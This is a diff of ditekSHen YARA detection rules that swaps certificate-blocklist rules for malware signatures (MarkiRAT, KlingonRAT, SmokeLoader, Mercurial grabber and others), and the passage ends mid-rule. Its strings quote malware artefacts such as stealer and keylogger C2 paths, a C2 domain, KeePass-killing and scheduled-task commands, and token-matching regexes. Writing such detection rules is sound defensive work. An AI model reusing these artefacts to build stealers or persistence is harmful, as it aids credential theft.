-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zaryad LLC" and pe.signatures [ i ] . serial == "3e:57:58:4d:b2:6a:2c:2e:bc:24:ae:3e:19:54:ff:f6" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( all of ( $c* ) and ( 2 of ( $s* ) or 1 of ( $m* ) or 1 of ( $p* ) ) ) or ( 1 of ( $m* ) and 1 of ( $s* ) and ( 1 of ( $c* ) or 1 of ( $p* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_13794371C052Ec0559E9B492Abb25C26 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent14 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader injector"
 		author = "ditekSHen"
-		id = "e2a4fdb2-fa04-5662-bb84-5c0c4892e3af"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6f80567e-b89a-557d-a282-b61c0b99625e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1923-L1934"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6365-L6378"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "af80177181efd92b4e1a4a5c665df01add069dc3b47074bcbdd503516cf5a844"
+		logic_hash = "2806b553635dbf96e9c00d3554dd5732df64200b3ae2c4845a2675218bd56387"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "dd3ab539932e81db45cf262d44868e1f0f88a7b0baf682fb89d1a3fcfba3980b"
-		importance = 20
+
+	strings:
+		$s1 = "%ProgramData%\\AVG" fullword wide
+		$s2 = "%ProgramData%\\AVAST Software" fullword wide
+		$s3 = "%wS\\%wS.vbs" fullword wide
+		$s4 = "%wS\\%wS.exe" fullword wide
+		$s5 = "CL,FR,US,CY,FI,HR,HU,RO,PL,IT,PT,ES,CA,DK,AT,NL,AU,AR,NP,SE,BE,NZ,SK,GR,BG,NO,GE" ascii
+		$s6 = "= CreateObject(\"Microsoft.XMLHTTP\")" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Carmel group LLC" and pe.signatures [ i ] . serial == "13:79:43:71:c0:52:ec:05:59:e9:b4:92:ab:b2:5c:26" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_51Aead5A9Ab2D841B449Fa82De3A8A00 : FILE
+rule DITEKSHEN_MALWARE_Win_Markirat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MarkiRAT"
 		author = "ditekSHen"
-		id = "d64ff10d-e4dd-5d89-a600-d136571be940"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6cfa276c-a64e-532a-a1ae-11a9e00867bd"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1936-L1947"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6380-L6403"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1658a12bb040b5b16c61469fe52abbaaecf5bd66bf5e45a2c2da9f80fa0c66f5"
+		logic_hash = "17b8bcfe8d2b4c87ff8e0bddb436e18029a3b28a5ad3994fe9bef359588d9cad"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "155edd03d034d6958af61bc6a7181ef8f840feae68a236be3ff73ce7553651b0"
-		importance = 20
+
+	strings:
+		$pdb = "\\mfcmklg.pdb" ascii
+		$s1 = "runinhome Completed" wide
+		$s2 = "ERROR find next file<br>" wide
+		$s3 = "<br><mark>Hello: %s</mark>" wide
+		$s4 = "<br><mark>CLIPBOARD[" wide
+		$s5 = "@userhome@" wide
+		$s6 = "Global\\{2194ABA1-BFFA-4e6b-8C26-D1BB20190312}" wide
+		$s7 = "taskkill /im svehost.exe /t /f" fullword ascii
+		$s8 = "taskkill /im keepass.exe /t /f" fullword ascii
+		$ba = /bitsadmin \/(addfile|cancel|SetPriority|resume)/ ascii wide
+		$c1 = "/ech/client.php?u=" wide
+		$c2 = "/up/uploadx.php?u=" wide
+		$c3 = "/ech/echo.php?req=rr&u=" wide
+		$c4 = "/ech/rite.php" wide
+		$c5 = "http://microsoft.com-view.space/i.php?u=" wide
+		$c6 = "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Corsair Software Solution Inc." and pe.signatures [ i ] . serial == "51:ae:ad:5a:9a:b2:d8:41:b4:49:fa:82:de:3a:8a:00" )
+		uint16( 0 ) == 0x5a4d and ( ( $pdb and any of them ) or ( 5 of ( $s* ) ) or ( 3 of ( $c* ) ) or ( ( #ba > 3 and 4 of them ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Bce1D49Ff444D032Ba3Dda6394A311E9 : FILE
+rule DITEKSHEN_MALWARE_Win_Klingonrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects KlingonRAT"
 		author = "ditekSHen"
-		id = "ee980353-b7c3-5738-84ae-e51c021e6597"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "bea50bce-b38c-50a0-902a-1014615bd9b8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1949-L1960"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6405-L6427"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eeb1556808e790eea964658a8499ec2d9cc5638bf696fbbade2bc08a29fb3e65"
+		logic_hash = "2abfbfc1b67f931f15bfdfd2cd4ba7821e62eb8c518bbc04629c0dd694bbd9c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e9a9ef5dfca4d2e720e86443c6d491175f0e329ab109141e6e2ee4f0e33f2e38"
-		importance = 20
+
+	strings:
+		$go = "Go build ID:" ascii
+		$s1 = "/UCRelease/src/client/uac/once/"
+		$s2 = "%T\\AppData\\Local\\Windows Update\\"
+		$s3 = "%TSoftware\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"
+		$s4 = "wmic /namespace:'\\\\root\\subscription' PATH"
+		$s5 = "C:\\Windows\\System32\\fodhelper.exeCaption,ParentProcessId,ProcessId"
+		$s6 = "ldpro.exelsass.exeluall.exeluspt.exe"
+		$s7 = "scangui.exedeps/lsass.exeetrustcipe.exefile"
+		$s8 = "alogserv.exeaplica32.exeapvxdwin.exeatro55en.exeautodown.exeavconsol.exeavgserv9.exeavkwctl9.exeavltmain.exeavpdos32.exeavsynmgr.exeavwupd32.exeavwupsrv.exe"
+		$c1 = "%s/keyLogger?machineId=%s" ascii
+		$c2 = "%s/stealer?machineId=%s" ascii
+		$c3 = "%s/lsass?machineId=%s" ascii
+		$c4 = "%s/logger?machineId=%s" ascii
+		$c5 = "%s/machineInfo?machineId=%s" ascii
+		$c6 = "failurehttps://%s:%d/botif-modified-sinceillegal" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DECIPHER MEDIA LLC" and pe.signatures [ i ] . serial == "bc:e1:d4:9f:f4:44:d0:32:ba:3d:da:63:94:a3:11:e9" )
+		uint16( 0 ) == 0x5a4d and ( $go ) and ( 3 of ( $c* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $c* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Dadf44E4046372313Ee97B8E394C4079 : FILE
+rule DITEKSHEN_MALWARE_Win_Xfiles : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects X-Files infostealer (formerly BotSh1zoid)"
 		author = "ditekSHen"
-		id = "bb7178f4-079f-5f7e-9761-3f73203603c7"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3f8b2f9b-aa6a-5ffc-95b8-5e44de0d1a49"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1962-L1973"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6429-L6460"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e4480ad6ce302a87e38915ef7ba09a94a4626ed359333276b899474f21d46238"
+		logic_hash = "0c04a8f019aea36f4bba3ce8289c2d608c69d76bbf321052560b4ca2214be057"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "80986ae0d4f8c8fabf6c4a91550c90224e26205a4ca61c00ff6736dd94817e65"
-		importance = 20
+
+	strings:
+		$x1 = "\\BotSh1zoid\\" ascii
+		$x2 = "\\BuildPacker.pdb" ascii
+		$x3 = "\\Svc_host.pdb" ascii nocase
+		$s1 = "WDefender" fullword ascii
+		$s2 = "CheckDefender" fullword ascii
+		$s3 = "RunPS" fullword ascii
+		$s4 = "DownloadFile" fullword ascii
+		$v1_1 = "<Pass encoding=\"base64\">(.*)</Pass>" wide
+		$v1_2 = "Grabber\\" wide
+		$v1_3 = "/log.php" wide
+		$v1_4 = /Browsers\\(Logins|Cards|Cookies)/ wide
+		$v1_5 = "<StealSteam>b__" ascii
+		$v1_6 = "record_header_field" fullword ascii
+		$v1_7 = "JavaScreenshotiptReader" fullword ascii
+		$v1_8 = "HTTPDebuggerPro" wide
+		$v1_9 = "IEInspector" wide
+		$v1_10 = "Fiddler" wide
+		$v2_1 = /get_(Cookie|Logins|Cards)Path/ fullword ascii
+		$v2_2 = "get_AllScreens" fullword ascii
+		$v2_3 = "{0}_{1}_{2}.zip" fullword wide
+		$v2_4 = "\\Stealer" fullword wide
+		$g1 = "$983a3552-4ec3-4936-bd4a-8e6fd67b4c67" fullword ascii
+		$g2 = "$a5d9ca4d-400f-4e07-8c09-a916b548f2e3" fullword ascii
+		$g3 = "$ebc25cf6-9120-4283-b972-0e5520d0000C" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Capital Management Ireland Limited" and pe.signatures [ i ] . serial == "00:da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $v1* ) or 3 of ( $v2* ) ) ) or 7 of ( $v1* ) or 3 of ( $v2* ) or ( 2 of ( $g* ) and 3 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00F8C2E08438Bb0E9Adc955E4B493E5821 : FILE
+rule DITEKSHEN_MALWARE_Win_Allakore : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects AllaKore"
 		author = "ditekSHen"
-		id = "75f505d0-c79a-5eab-a61f-29ec238ac045"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "371663c1-6faf-5ca3-a79e-e4340d44660b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1975-L1986"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6462-L6493"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2258ea96b56acb3025b5b2f39c07d482c375e75323d6f8e8ded91b8dab00656e"
+		logic_hash = "0e93682787e27246cdddbd67ca5360728c65049a2e97e71809b5902854aa4bef"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "459ef82eb5756e85922a4687d66bd6a0195834f955ede35ae6c3039d97b00b5f"
-		importance = 20
+
+	strings:
+		$x1 = "AllaKore Remote - Chat" fullword wide
+		$x2 = "AllaKore Remote - Share Files" fullword wide
+		$x3 = "CYRUS - Chat" fullword wide
+		$x4 = "CYRUS - Share Files" fullword wide
+		$x5 = "<|REDIRECT|><|GETFOLDERS|>" fullword wide
+		$x6 = "<|REDIRECT|><|DOWNLOADFILE|>" fullword wide
+		$x7 = "<|REDIRECT|><|WHEELMOUSE|>" fullword wide
+		$x8 = "<|REDIRECT|><|SETMOUSE" wide
+		$x9 = "<|CHECKIDPASSWORD|>" fullword wide
+		$x10 = "<|KEYBOARDSOCKET|>" fullword wide
+		$x11 = "<|REDIRECT|><|CLIPBOARD|>" fullword wide
+		$x12 = "<|IDEXISTS!REQUESTPASSWORD|>" fullword wide
+		$x13 = "<|GETFULLSCREENSHOT|>" fullword wide
+		$x14 = "<|MAINSOCKET|>" fullword ascii
+		$s1 = "You can not connect with yourself!" wide
+		$s2 = "Waiting for authentication..." wide
+		$s3 = "Connected support!" wide
+		$s4 = "ID does nor exists." wide
+		$s5 = "Finding the ID..." wide
+		$s6 = "PC is Busy!" wide
+		$s7 = "Upload &  Execute" fullword ascii
+		$s8 = "Download file selected" fullword ascii
+		$s9 = "CaptureKeys_TimerTimer" fullword ascii
+		$s10 = "Remote File Manager" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DocsGen Software Solutions Inc." and pe.signatures [ i ] . serial == "00:f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 4 of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $x* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D2Caf7908Aaebfa1A8F3E2136Fece024 : FILE
+rule DITEKSHEN_MALWARE_Win_Reverserat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ReverseRAT"
 		author = "ditekSHen"
-		id = "043a598d-8b84-597f-ac2e-035cc9ccef77"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "df13fc6c-025a-54db-809d-4f3c27b8aa7a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1988-L1999"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6495-L6514"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2c8a322e687ed575e66ff308bcf0950ab87bc5ac3ab561c8cc3d81e9181ac708"
+		logic_hash = "87ab00a5588bfce04ec47a07b184fffe359e472ac8bf561b02a8b070edf2e014"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "82baf9b781d458a29469e5370bc9752ebef10f3f8ea506ca6dd04ea5d5f70334"
-		importance = 20
+
+	strings:
+		$pdb1 = "\\ReverseRat.pdb" ascii nocase
+		$pdb2 = "\\ReverseRat\\obj\\" ascii nocase
+		$s1 = "processCmd" fullword ascii
+		$s2 = "CmdOutputDataHandler" fullword ascii
+		$s3 = "sendingProcess" fullword ascii
+		$s4 = "SetStartup" fullword ascii
+		$s5 = "RunServer" fullword ascii
+		$s6 = "_OutputDataReceived" ascii
+		$s7 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00
+                00 03 0a 00 00 13 74 00 65 00 72 00 6d 00
+                69 00 6e 00 61 00 74 00 65 00 00 09 65 00
+                78 00 69 00 74 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FANATOR, OOO" and pe.signatures [ i ] . serial == "00:d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 2 of ( $s* ) ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_003223B4616C2687C04865Bee8321726A8 : FILE
+rule DITEKSHEN_MALWARE_Win_Smokeloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SmokeLoader variants"
 		author = "ditekSHen"
-		id = "05320823-08e5-58f4-896c-ae7f01b40a3b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e8f28f89-3a79-5d78-8c0a-bad16a57df84"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2001-L2012"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6516-L6539"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "671e3a589fb24a6c5e38126df45a4767815eff32014172930cab6ffbe135af81"
+		logic_hash = "65c56ed11a3cb4e4bcf8fd2a6be097545cb96e84ba4c4202969d1d163a2a36ed"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "321218e292c2c489bbc7171526e1b4e02ef68ce23105eee87832f875b871ed9f"
-		importance = 20
+
+	strings:
+		$x1 = "G2A/CLP/05/RYS" fullword wide
+		$x2 = "0N1Y/53R10U5/BU51N355" fullword wide
+		$x3 = "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG" fullword wide
+		$s1 = "Azure-Update-Task" fullword wide
+		$s2 = "C:\\Windows\\System32\\schtasks.exe" fullword wide
+		$s3 = "/C /create /F /sc minute /mo 1 /tn \"" fullword wide
+		$s4 = "\\Microsoft\\Network" fullword wide
+		$s5 = "\\Microsoft\\TelemetryServices" fullword wide
+		$s6 = "\" /tr \"" fullword wide
+		$e1 = "\\sqlcmd.exe" fullword wide
+		$e2 = "\\sihost.exe" fullword wide
+		$e3 = "\\fodhelper.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "32:23:b4:61:6c:26:87:c0:48:65:be:e8:32:17:26:a8" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $e* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Fa13Ae98E17Ae23Fcfe7Ae873D0C120 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector03 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown loader / injector"
 		author = "ditekSHen"
-		id = "5e926cb1-efd0-5f9d-9327-341bb2f1a5f5"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "2d0df2d8-5b1c-5408-b8c7-8ca14d57da0f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2014-L2025"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6541-L6551"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "312d810386aebb509ffbd09d6b1ad6a761a03bc07ba5e4a158235786063389a9"
+		logic_hash = "10092e7916775fe0a39baa5714fdda89f443ceabdcc610cc1fcd5a0fb0e68d0c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "be226576c113cd14bcdb67e46aab235d9257cd77b826b0d22a9aa0985bad5f35"
-		importance = 20
+
+	strings:
+		$x1 = "LOADER ERROR" fullword ascii
+		$s1 = "_ZN6curlpp10OptionBaseC2E10CURLoption" fullword ascii
+		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KLAKSON, LLC" and pe.signatures [ i ] . serial == "0f:a1:3a:e9:8e:17:ae:23:fc:fe:7a:e8:73:d0:c1:20" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3696883055975D571199C6B5D48F3Cd5 : FILE
+rule DITEKSHEN_MALWARE_Win_Coinminer02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects coinmining malware"
 		author = "ditekSHen"
-		id = "8af62be2-488f-5474-b674-73bf157dff00"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "1878a1b5-4e97-5575-802e-573caded2b3a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2027-L2038"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6553-L6571"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9232413a071a6100ba806b1fad2cd6cd2bb85351c36ad25cfc31b66ad041d686"
+		logic_hash = "83760aef667819923a2ac67c006e03bb6d4260b7a4aedd691dd5b145fb50d5c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "933749369d61bebd5f2c63ff98625973c41098462d9732cffaffe7e02823bc3a"
-		importance = 20
+
+	strings:
+		$s1 = "%s/%s (Windows NT %lu.%lu" fullword ascii
+		$s2 = "\\Microsoft\\Libs\\WR64.sys" wide
+		$s3 = "\\\\.\\WinRing0_" wide
+		$s4 = "pool_wallet" ascii
+		$s5 = "cryptonight" ascii
+		$s6 = "mining.submit" ascii
+		$c1 = "stratum+ssl://" ascii
+		$c2 = "daemon+http://" ascii
+		$c3 = "stratum+tcp://" ascii
+		$c4 = "socks5://" ascii
+		$c5 = "losedaemon+https://" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Korist Networks Incorporated" and pe.signatures [ i ] . serial == "36:96:88:30:55:97:5d:57:11:99:c6:b5:d4:8f:3c:d5" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 1 of ( $c* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Aff762E907F0644E76Ed8A7485Fb12A1 : FILE
+rule DITEKSHEN_MALWARE_Win_Mercurial : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Mercurial infostealer"
 		author = "ditekSHen"
-		id = "92113fc4-ef5b-5e86-bc8e-baf342ddf276"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c262ada2-01ca-5fc1-adef-987908514019"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2040-L2051"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6573-L6593"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0be4642f6aaf2183d593240efcc8c2046970d3806a67ff53ca4ce7ee85df90e5"
+		logic_hash = "400f8f717a4e07bf4de508c02bbcd9e82bf21f3df84c989fc622378f33e192f0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7b0c55ae9f8f5d82edbc3741ea633ae272bbb2207da8e88694e06d966d86bc63"
-		importance = 20
+
+	strings:
+		$x1 = "mercurial grabber" wide nocase
+		$x2 = "\"text\":\"Mercurial Grabber |" wide
+		$x3 = "/nightfallgt/mercurial-grabber" wide
+		$s1 = "/LimerBoy/Adamantium-Thief/" ascii
+		$s2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0" fullword wide
+		$s3 = "StealCookies" fullword ascii
+		$s4 = "StealPasswords" fullword ascii
+		$s5 = "DetectDebug" fullword ascii
+		$s6 = "CaptureScreen" fullword ascii
+		$s7 = "WebhookContent" fullword ascii
+		$s8 = /Grab(Token|Product|IP|Hardware)/ fullword ascii
+		$p1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword ascii wide
+		$p2 = "mfa\\.[\\w-]{84}" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lets Start SP Z O O" and pe.signatures [ i ] . serial == "00:af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 5 of ( $s* ) or ( all of ( $p* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5B440A47E8Ce3Dd202271E5C7A666C78 : FILE
+rule DITEKSHEN_MALWARE_Win_Phonzy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects specific downloader agent"
 		author = "ditekSHen"
-		id = "62c9a37c-e4dd-5925-a019-08bf6a77476d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d35f41e4-4633-5482-9ae4-79354463f1b9"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2053-L2064"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6595-L6608"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f898a3495e173d85fd62598da87ab15cbee0674519231a5e770204a4db3cd93f"
+		logic_hash = "924e7674d76594314df1a32d38f19cee12a3ed49cdf5e153f98bb08a7634055c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "07e4cbdd52027e38b86727e88b33a0a1d49fe18f5aee4101353dd371d7a28da5"
-		importance = 20
+
+	strings:
+		$ua1 = "User-Agent: Mozilla/5.0 (X11; Linux" wide
+		$s1 = "<meta name=\"keywords\" content=\"([\\w\\d ]*)\">" fullword wide
+		$s2 = "WebClient" fullword ascii
+		$s3 = "WriteAllText" fullword ascii
+		$s4 = "DownloadString" fullword ascii
+		$s5 = "WriteByte" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Master Networking s.r.o." and pe.signatures [ i ] . serial == "5b:44:0a:47:e8:ce:3d:d2:02:27:1e:5c:7a:66:6c:78" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $ua* ) and ( $s1 ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Fe41941464B9992A69B7317418Ae8Eb7 : FILE
+rule DITEKSHEN_MALWARE_Win_Hive : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Hive ransomware"
 		author = "ditekSHen"
-		id = "44626304-7f68-5d3a-81b4-91ee0bd09cc3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7b79dc54-01c7-5667-acf5-a32cd7a45b54"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2066-L2077"
